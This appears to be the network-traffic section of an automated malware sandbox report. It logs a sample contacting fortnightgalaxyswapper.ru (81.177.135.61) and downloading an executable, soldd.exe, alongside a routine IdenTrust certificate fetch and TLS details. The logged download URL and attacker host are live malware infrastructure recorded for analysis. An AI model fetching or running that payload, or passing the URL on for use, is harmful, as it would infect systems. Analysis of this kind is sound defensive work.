Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
apps.identrust.com |
CNAME
a1952.dscq.akamai.net
CNAME
identrust.edgesuite.net
|
23.216.159.81 |
fortnightgalaxyswapper.ru | 81.177.135.61 |
- TCP Requests
-
-
192.168.56.103:49164 138.124.186.58:48619
-
192.168.56.103:49166 23.65.188.19:80apps.identrust.com
-
192.168.56.103:49165 81.177.135.61:443fortnightgalaxyswapper.ru
-
192.168.56.103:49174 81.177.135.61:443fortnightgalaxyswapper.ru
-
192.168.56.103:49175 81.177.135.61:443fortnightgalaxyswapper.ru
-
192.168.56.103:49178 81.177.135.61:443fortnightgalaxyswapper.ru
-
192.168.56.103:49179 81.177.135.61:443fortnightgalaxyswapper.ru
-
GET
200
https://fortnightgalaxyswapper.ru/soldd.exe
REQUEST
RESPONSE
BODY
GET /soldd.exe HTTP/1.1
Host: fortnightgalaxyswapper.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 03 Nov 2021 00:35:38 GMT
Content-Type: application/octet-stream
Content-Length: 4608
Connection: keep-alive
Server: Jino.ru/mod_pizza
Last-Modified: Wed, 27 Oct 2021 18:11:47 GMT
ETag: "131104b9-1200-5cf598703094f"
Accept-Ranges: bytes
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Wed, 03 Nov 2021 01:35:38 GMT
Date: Wed, 03 Nov 2021 00:35:38 GMT
Connection: keep-alive
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49165 81.177.135.61:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.fortnightgalaxyswapper.ru | df:63:f6:57:a5:df:72:29:28:41:41:e4:89:3e:db:c6:65:a6:6e:b6 |
Snort Alerts
No Snort Alerts